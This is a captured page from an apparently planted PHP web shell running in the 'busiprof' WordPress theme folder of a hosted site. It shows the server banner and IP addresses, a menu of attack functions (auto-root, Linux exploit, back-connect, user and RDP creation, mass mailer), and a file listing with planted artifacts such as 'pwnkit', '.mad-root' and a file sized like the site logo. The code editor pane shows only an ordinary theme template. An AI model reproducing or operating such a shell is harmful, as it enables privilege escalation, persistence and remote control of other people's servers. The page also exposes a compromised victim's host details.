Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
busiprof /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
functions
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
840
B
-rw-r--r--
Page-fullwidth.php
694
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
2.15
KB
-rw-r--r--
author.php
1.71
KB
-rw-r--r--
category.php
1.77
KB
-rw-r--r--
comments.php
3.56
KB
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
content.php
1.37
KB
-rw-r--r--
footer.php
961
B
-rw-r--r--
front-page.php
922
B
-rw-r--r--
functions.php
2.82
KB
-rw-r--r--
functionsbak.php
2.34
KB
-rw-r--r--
header.php
1.93
KB
-rw-r--r--
index-bannerstrip.php
898
B
-rw-r--r--
index-projects.php
5.53
KB
-rw-r--r--
index-services.php
5
KB
-rw-r--r--
index-slider.php
1.14
KB
-rw-r--r--
index-testimonials.php
4.26
KB
-rw-r--r--
index.php
1.01
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
page.php
1.28
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
8.83
KB
-rw-r--r--
screenshot.png
390.92
KB
-rw-r--r--
search.php
1.37
KB
-rw-r--r--
searchform.php
598
B
-rw-r--r--
sidebar-woocommerce.php
314
B
-rw-r--r--
sidebar.php
191
B
-rw-r--r--
single.php
1.11
KB
-rw-r--r--
style.css
34.66
KB
-rw-r--r--
tag.php
1.76
KB
-rw-r--r--
theme_setup_data.php
9.25
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : content.php
<article class="post"> <span class="site-author"> <figure class="avatar"> <?php $author_id=$post->post_author; ?> <a data-tip="<?php the_author() ;?>" href="<?php echo get_author_posts_url( get_the_author_meta( 'ID' ) );?>" data-toggle="tooltip" title="<?php echo the_author_meta( 'display_name' , $author_id ); ?>"><?php echo get_avatar( get_the_author_meta( 'ID' ), 32 ); ?></a> </figure> </span> <header class="entry-header"> <?php if ( is_single() ) : the_title('<h3 class="entry-title">', '</h3>' ); else: the_title( sprintf( '<h3 class="entry-title"><a href="%s" rel="bookmark">', esc_url( get_permalink() ) ), '</a></h3>' ); endif; ?> </header> <div class="entry-meta"> <span class="entry-date"><a href="<?php the_permalink(); ?>"><time datetime=""><?php the_time('M j,Y');?></time></a></span> <span class="comments-link"><a href="<?php the_permalink(); ?>"><?php comments_popup_link( __( 'Leave a comment', 'busiprof' ) ); ?></a></span> <?php if( get_the_tags() ) { ?> <span class="tag-links"><a href="<?php the_permalink(); ?>"><?php the_tags('', ', ', ''); ?></a></span> <?php } ?> </div> <a href="<?php the_permalink(); ?>" class="post-thumbnail" ><?php the_post_thumbnail(); ?></a> <div class="entry-content"> <?php the_content( __('Read More','busiprof') ); ?> </div> </article>
Close